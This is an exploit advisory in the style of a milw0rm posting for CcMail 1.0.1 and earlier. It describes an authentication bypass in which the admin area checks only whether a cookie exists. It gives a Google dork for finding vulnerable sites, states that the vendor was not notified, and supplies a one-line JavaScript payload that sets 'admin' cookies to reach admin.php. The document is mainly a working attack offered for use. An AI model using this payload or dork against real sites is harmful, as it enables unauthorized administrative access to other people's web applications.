41 lines
No EOL
1.4 KiB
Text
41 lines
No EOL
1.4 KiB
Text
--==+================================================================================+==--
|
|
--==+ CcMail <= 1.0.1 Insecure Cookie Handling +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
Discovered By: t0pP8uZz
|
|
Discovered On: 11 April 2008
|
|
Script Download: http://www.cicoandcico.com/download/download.php?SortBy=1&fdir=./ccmail/
|
|
DORK: "Emanuele Guadagnoli" "CcMail"
|
|
|
|
Vendor Has Not Been Notified!
|
|
|
|
|
|
DESCRIPTION:
|
|
CcMail (all versions) suffers from insecure cookie handling, this allows the remote attacker to set a cookie
|
|
and be granted access to the admin area. this is because CcMail only checks if the cookie exists, it doesnt
|
|
compare the data.
|
|
|
|
by entering the below javascript into your (firefox/thunderbird etc) cookies will be created allowing you
|
|
to login to "admin.php"
|
|
|
|
|
|
Exploit:
|
|
|
|
javascript:document.cookie = "name=admin; path=/;"; document.cookie = "this_cookie=admin; path=/;";
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
after running the above code you will be able to visit the admin area at "admin.php"
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ CcMail <= 1.0.1 Insecure Cookie Handling +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-04-12] |